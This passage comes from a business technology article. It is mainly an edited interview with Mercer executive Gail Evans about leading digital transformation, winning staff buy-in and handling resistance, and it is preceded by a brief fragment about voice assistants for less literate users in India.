Then, of course, I’m loving the new stream that we are creating, which is all around exploring voice as a technology. The voice assistants are getting more intelligent. It gives us a very unique opportunity to reach out and bring the digital transformation to a lot of Indians who aren’t as literate, to those for whom reading and writing don’t come as naturally as speaking does. It’s opening up a whole lot of new doors, and we’re really finding that a very interesting space to work in. We’re exploring a lot in that arena at the moment.

How to muster the troops

A digital transformation journey, make no mistake, is no walk in the park. It involves major course corrections to technology, to business processes, to how people do their jobs and how they think about their roles. So, how does a company make something so radical as digital transformation part of its DNA?

Gail Evans, who was promoted in June from global CIO at Mercer to the consulting firm’s global chief digital officer, believes an important first step is getting people to see what’s in it for them, “because once you see the value, you’re all in.”

In this video recorded in May at the MIT Sloan CIO Symposium, then-CIO Evans provided some insight into how she musters the troops at Mercer, explaining that a digital transformation journey is, by nature, long and iterative, requiring people to see value all along the way.

Editor’s note: The following was edited for clarity and brevity.

What can companies do to get started on a digital transformation journey?

Gail Evans: Actually, I think there are a couple of things. I think digital transformation, at its core, is the people. At the very core of any transformation, it is about how do you inspire a team to align to this new era — this new era of different tools, different technologies that can be applied in many different, creative ways to create new business models or to drive efficiencies in your organization.

So, I think the leaders in the enterprise are ones who understand the dynamics of taking your core and moving it up the food chain. Where does it start? I think it starts with creating a beachhead, creating a platform of digital, and then allowing that to grow and swell with training and opportunities, webinars, blogs so that it becomes a part of a company’s DNA. Because I believe digital isn’t a thing — it’s a new way of doing things to create value through the application of technology and data.

Which departments at Mercer are in the vanguard of digital transformation? Who are laggards?

Evans: One would argue that marketing is already digital, right? I mean, they are already using digital technologies to drive personalized experiences on the web and have been doing that for many years. I would say that it starts in, probably, technology. Technology will embrace it, and also it needs to be infused into the business leaders.

I think the laggards are typically … I guess I wouldn’t necessarily call them ‘laggards.’ I think I would refer to them as not yet seeing the value of digital, because once you see the value, you’re all in.

Pockets of resistance

[Digital transformation is] humans plus technology and new business models. That is what digital transformation is all about and it’s fun!
Gail Evans, global chief digital officer, Mercer

Evans: There are teams or pockets of folks who have done things the same way for a long time and there is a resistance there. It’s kind of the, ‘If it ain’t broke, don’t fix it.’ Those are pockets, but you’d find those pockets in every transformation, whether it’s digital or [moving into the] information age, whatever — you’ll find pockets of people who are not ready to go.

And so, I think there are pockets of people in our core legacy who are holding onto their technology of choice and may not have up-skilled themselves, so they are holding on and they are resisting.

And then there are business folks who have been used to one-to-one relationships and built their whole career — a very successful career — with those one-to-one relationships. And now digital is coming from a different place where some of what you might have thought was your IP in value is now in algorithms. What will you do differently and how do you manage those dynamics differently?

I think there’s education [that needs to happen] because I think it’s humans plus technology, it’s not just technology; it’s humans plus technology and new business models. That is what digital transformation is all about and it’s fun! It is a new way to just have fun. It will be something else two, three, five years from now.

Speaking to ‘hearts and minds’

What strategies do you have for getting people to sign on for that ‘fun’ digital transformation journey?

Evans: At Mercer, what I’ve done was, first, you have to create, I think, a very strong digital strategy that is not just textbook strategy, but one that speaks to the hearts and minds from the executive team down to the person who’s coding, that they can relate to and become a part of it. Many people believe, ‘What’s in it for me? Yeah, I get that technology stuff, but what is it in for me?’ [Showing that] then what is in it for the business and bringing that strategy together and having proof points along the way [is important].

It’s not a big bang approach; it’s really very agile and iterative. And so, as you iterate and show value, people will become more open to change as you train them. So build a strategy and inspire your team, and inspire your executive leadership team, because that’s where all the money is. You need the money, so they need to believe in the digital transformation [journey] and the revenue aspect and the stakeholder value that it would bring.

Basically, create a strong vision that applies to the team, create a strategy that is based on efficiencies and revenue and also create what many call a bimodal [IT approach] because you need to continue to drive the core legacy systems and optimize. They’re still the bread and butter of the company. So, you have to find a strategy that allows both to grow.
